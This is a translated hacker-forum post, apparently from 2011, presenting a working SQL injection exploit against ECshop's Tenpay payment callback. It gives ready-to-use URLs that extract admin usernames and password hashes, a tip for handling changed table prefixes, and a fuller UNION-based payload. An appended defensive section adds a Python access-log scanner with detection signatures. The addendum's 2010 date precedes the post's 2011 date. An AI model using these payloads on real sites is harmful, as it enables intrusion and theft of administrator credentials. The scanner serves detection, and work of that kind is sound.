
ECshop payment-method 0day: manual injection EXP

Published: 2011-01-16 22:45  Source: 黑白前线  Author: udb311

Text and screenshots: 黑白过客

Topic: a study of manual injection for the ECshop payment-method 0day

The original EXP was:

respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Vulnerability details: http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html

I had been unable to obtain the username and password by manual injection.

After a pointer from an expert, I succeeded in building an exp that returns the username and password fields.

Extracting the username:

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

Extracting the password:

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20password%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

If the table prefix has been changed, the error looks like this:

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )

Simply change ecs_admin_user to aml_admin_user.

Screenshot as proof (image not preserved in this copy).

Finally, thanks to the master Luc1f3r.

Addendum, 2010-01-30

Full-featured EXP:

respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
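A defender-side complement to the payloads above, added here and not part of the original post: a Python scanner that flags access-log requests carrying the double-query error-based pattern (count(*), concat(...), floor(rand(0)*2) with GROUP BY, information_schema) in any query parameter. The log lines are constructed, and the signature names are my own.

```python
"""Added detection example: flag requests carrying the double-query error-based
SQL injection pattern shown in this post in web server access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Signatures of the technique, matched against each URL-decoded,
# whitespace-collapsed, lower-cased query parameter value.
SIGNATURES = {
    "rand_groupby": re.compile(r"floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\).*?group\s+by"),
    "count_concat": re.compile(r"count\(\s*\*\s*\)\s*,\s*concat\("),
    "info_schema": re.compile(r"information_schema\."),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
}
# Request line of the Apache/nginx combined log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def inspect_url(url: str) -> dict:
    """Return {param: [signature names]} for every query parameter that matches."""
    hits = {}
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            norm = re.sub(r"\s+", " ", value).lower()
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(norm)]
            if matched:
                hits[name] = sorted(set(hits.get(name, [])) | set(matched))
    return hits

def scan_log(lines) -> list:
    """Return (line_no, path, param, signatures) for each suspicious request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for param, sigs in inspect_url(m.group(1)).items():
            findings.append((no, urlsplit(m.group(1)).path, param, sigs))
    return findings

# Constructed sample log lines (not real traffic): a legitimate Tenpay
# callback, the post's sp_billno payload, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jan/2011:22:45:01 +0800] "GET /respond.php?code=tenpay&attach=voucher&sp_billno=20110116001 HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jan/2011:22:46:10 +0800] "GET /respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20user_name%20FROM%20ecs_admin_user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 1337',
    '203.0.113.9 - - [16/Jan/2011:22:47:22 +0800] "GET /goods.php?id=42 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same check belongs server-side as well: a payment callback whose order id is not a plain integer should be rejected before it reaches the database, which is what the `order_id=1 and(...)` fragment in the error report above shows was not happening.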